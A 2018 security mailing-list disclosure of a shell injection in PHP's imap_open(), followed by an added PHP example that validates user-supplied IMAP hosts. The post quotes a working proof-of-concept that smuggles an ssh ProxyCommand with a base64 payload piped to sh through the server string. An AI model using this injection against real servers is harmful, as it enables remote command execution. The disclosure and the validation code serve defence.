Date: Thu, 22 Nov 2018 21:02:14 +0100
From: Hanno Böck <hanno@...eck.de>
To: oss-security@...ts.openwall.com
Subject: PHP imap_open() script injection

Hi,

This was apparently posted on some Russian forum recently and then
re-posted to GitHub:
https://antichat.com/threads/463395/#post-4254681
https://github.com/Bo0oM/PHP_imap_open_exploit/blob/master/exploit.php

PoC code:
$server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh}";
imap_open('{'.$server.':143/imap}INBOX', '', '') or die("\n\nError: ".imap_last_error());

It's pretty self-explanatory: it seems imap_open() will pass things to
ssh, and this is vulnerable to a shell injection.

Impact would be mostly relevant if someone has some imap functionality
where a user can define a custom imap server. (Though it might also be
used as a bypass for environments where exec() and similar functions
are restricted.)

I reported it to upstream PHP a few days ago; it was closed as a
duplicate, so it seems they already knew about it. It's unfixed in
current versions.

There seems to be some speculation that this might've been involved in a
hack of a .onion hoster:
https://danwin1210.me/


-- 
Hanno Böck
https://hboeck.de/

mail/jabber: hanno@...eck.de
GPG: FE73757FA60E4E21B937579FA5880072BBB51E42
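
One way to constrain a user-defined IMAP server before it reaches imap_open(), as an added example that is not part of the original post. The function name build_imap_mailbox and the sample hosts are made up for illustration; /norsh is the mailbox flag documented for imap_open() that disables the rsh/ssh preauthenticated session.

```php
<?php
// Added example, not from the original post: validate a user-supplied IMAP
// host and port before building the mailbox string for imap_open().
// build_imap_mailbox() is a hypothetical helper name.

function build_imap_mailbox(string $host, $port, bool $ssl = true): string
{
    // Hostname labels only: letters, digits and inner hyphens, dot-separated.
    // This rejects spaces, tabs, '}', '/', '=', '|' and a leading '-', which
    // are the characters the PoC host value depends on. IPv6 literals are
    // not accepted by this pattern.
    $label = '[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    $re = '/\A' . $label . '(?:\.' . $label . ')*\z/';
    if (strlen($host) > 253 || !preg_match($re, $host)) {
        throw new InvalidArgumentException('invalid IMAP host');
    }

    // The port must be a plain integer, so it cannot carry extra mailbox
    // syntax such as "143/imap}INBOX".
    $port = filter_var($port, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 65535]]);
    if ($port === false) {
        throw new InvalidArgumentException('invalid IMAP port');
    }

    // /norsh: do not use rsh or ssh to establish a preauthenticated session.
    $flags = '/imap' . ($ssl ? '/ssl' : '') . '/norsh';
    return '{' . $host . ':' . $port . $flags . '}INBOX';
}

// Constructed sample inputs (not taken from any real deployment).
$samples = [
    ['mail.example.org', 993],
    ['x -oProxyCommand=placeholder}', 143],   // shape of the PoC host value
    ['-oProxyCommand=placeholder', 143],      // option-like leading '-'
    ['mail.example.org', '143/imap}INBOX'],   // mailbox syntax in the port
];

foreach ($samples as [$h, $p]) {
    try {
        // Only a string that passed validation would be handed to imap_open().
        echo 'ok:       ', build_imap_mailbox($h, $p), "\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', json_encode($h), ' (', $e->getMessage(), ")\n";
    }
}
```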
